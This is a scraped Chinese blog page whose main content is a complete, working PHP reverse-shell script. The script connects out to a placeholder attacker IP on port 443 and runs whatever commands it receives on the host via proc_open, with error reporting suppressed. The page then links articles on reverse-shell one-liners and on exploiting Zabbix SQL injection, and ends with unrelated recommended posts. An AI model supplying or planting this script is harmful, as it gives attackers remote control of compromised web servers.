<?php 

error_reporting (E_ERROR);

ignore_user_abort(true);

ini_set('max_execution_time',0);

$os = substr(PHP_OS,0,3);

$ipaddr = 'x.x.x.x';

$port = '443';

$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));

$cwd = getcwd();

$msg = php_uname()."\n------------Code by Spider-------------\n";

if($os == 'WIN') {

    $env = array('path' => 'c:\\windows\\system32');

} else {

    $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');

}

if(function_exists('fsockopen')) {

    $sock = fsockopen($ipaddr,$port);

    fwrite($sock,$msg);

    while ($cmd = fread($sock,1024)) {

        if (substr($cmd,0,3) == 'cd ') {

            $cwd = trim(substr($cmd,3,-1));

            chdir($cwd);

            $cwd = getcwd();

        }

        if (trim(strtolower($cmd)) == 'exit') {

            break;

        } else {

            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);

            if (is_resource($process)) {

                fwrite($pipes[0],$cmd);

                fclose($pipes[0]);

                $msg = stream_get_contents($pipes[1]);

                fwrite($sock,$msg);

                fclose($pipes[1]);

                $msg = stream_get_contents($pipes[2]);

                fwrite($sock,$msg);

                fclose($pipes[2]);

                proc_close($process);

            }

        }

    }

    fclose($sock);

} else {

    $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);

    socket_connect($sock,$ipaddr,$port);

    socket_write($sock,$msg);

    fwrite($sock,$msg);

    while ($cmd = socket_read($sock,1024)) {

        if (substr($cmd,0,3) == 'cd ') {

            $cwd = trim(substr($cmd,3,-1));

            chdir($cwd);

            $cwd = getcwd();

        }

        if (trim(strtolower($cmd)) == 'exit') {

            break;

        } else {

            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);

            if (is_resource($process)) {

                fwrite($pipes[0],$cmd);

                fclose($pipes[0]);

                $msg = stream_get_contents($pipes[1]);

                socket_write($sock,$msg,strlen($msg));

                fclose($pipes[1]);

                $msg = stream_get_contents($pipes[2]);

                socket_write($sock,$msg,strlen($msg));

                fclose($pipes[2]);

                proc_close($process);

            }

        }

    }

    socket_close($sock);

}

?>

fsockopen反弹shell脚本的更多相关文章

  1. 如何DIY一个简单的反弹Shell脚本

    00起因 之前在一个服务器上做测试的时候需要从本地连到服务器上,但是服务器没有开ssh服务,但是有python环境,想着自己写一个脚本可以从自己本地连接到服务器,然后服务器端可以将处理完的请求结果返回 ...

  2. 常用的反弹shell脚本

    bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/ <& >& Python shell 反弹脚本 #!/usr ...

  3. Zabbix sql注入漏洞脚本执行反弹shell

    exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...

  4. Linux下反弹shell的种种方式

    [前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里s ...

  5. 从一次渗透谈到linux如何反弹shell

    零.绪论 背景: ThinkPHP框架的--> 找到一个OS命令注入(很简单的Burp可以直接扫出来的那种):页面配置系统默认网关处. 一.渗透过程 1.首先看了一下,没有回显. 2.用ceye ...

  6. linux反弹shell

    参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-s ...

  7. linux下反弹shell

    01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali        ...

  8. Linux 反弹 Shell

    攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写 ...

  9. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规 ...

随机推荐

  1. 简单看看es6解构赋值

    哎,我真的是太难了,今天就被这个解构赋值(也可以叫做析构,貌似析构是在c++中的,所以我这里叫做解构赋值吧)弄的我很烦,本来以为很容易的,结果还是弄了好久...就总结一下解构吧! 1.解构的基本使用 ...

  2. 深度学习优质学习项目大放送!-AI Studio精选开源项目合集推荐

    近期 在AI Studio上发现了不少优质的开源深度学习项目,从深度学习入门到进阶,涵盖了CV.NLP.生成对抗网络.强化学习多个研究方向,还有最新的动态图,都以NoteBook的方式直接开源出来,并 ...

  3. python基础之元组讲解

    概念讲解: 1.Python 的元组与列表十分相似,但是元组的元素只可读不可修改: 2.元组使用小括号,列表使用方括号: 3.元组创建很简单,只需要在括号中添加元素,并使用逗号隔开即可. (1)创建一 ...

  4. antdesign的input增加自定义校验规则

    rules: [ {required: true, message: '请输入姓名'}, {max: 16, message: '姓名过长'}, { validator: (rule, val, ca ...

  5. 系统 (一) Windows10安装Ubuntu子系统

    前言 本文将基于 Windows10专业版 安装 Ubuntu子系统 1.控制面板 -> 程序 -> 选择启用或关闭Windows功能 -> 勾上 适用Linux的Windwos子系 ...

  6. 【5000 Stars 福利】微信接口动态 WebApi 使用说明

    前言 作为中国 C# 开源项目中 Watch/Star/Fork 最高的项目之一,Senparc.Weixin SDK  凝聚了盛派微信团队持续7年的付出,和大量开发者的无私贡献,以及数万开发者的使用 ...

  7. vue应用调试工具 vue-devtools安装

    方法一:chrome直接访问下面地址下载安装:(需要翻墙) https://chrome.google.com/webstore/detail/vuejs-devtools/nhdogjmejigli ...

  8. leaflet-webpack 入门开发系列五地图卷帘(附源码下载)

    前言 leaflet-webpack 入门开发系列环境知识点了解: node 安装包下载webpack 打包管理工具需要依赖 node 环境,所以 node 安装包必须安装,上面链接是官网下载地址 w ...

  9. 【Beta阶段】第十二周Scrum会议

    [Beta阶段]第十二周Scrum会议 本次会议为第十二周第一次Scrum Meeting,会议对Beta阶段工作进行了总结,针对Beta阶段还未完成的问题进行了讨论. 会议时间为2019.12.3. ...

  10. 华为网络设备修改console密码

    user-interface con 0set authentication password cipher 新密码 有的版本为 <FW> system-view[FW] user-int ...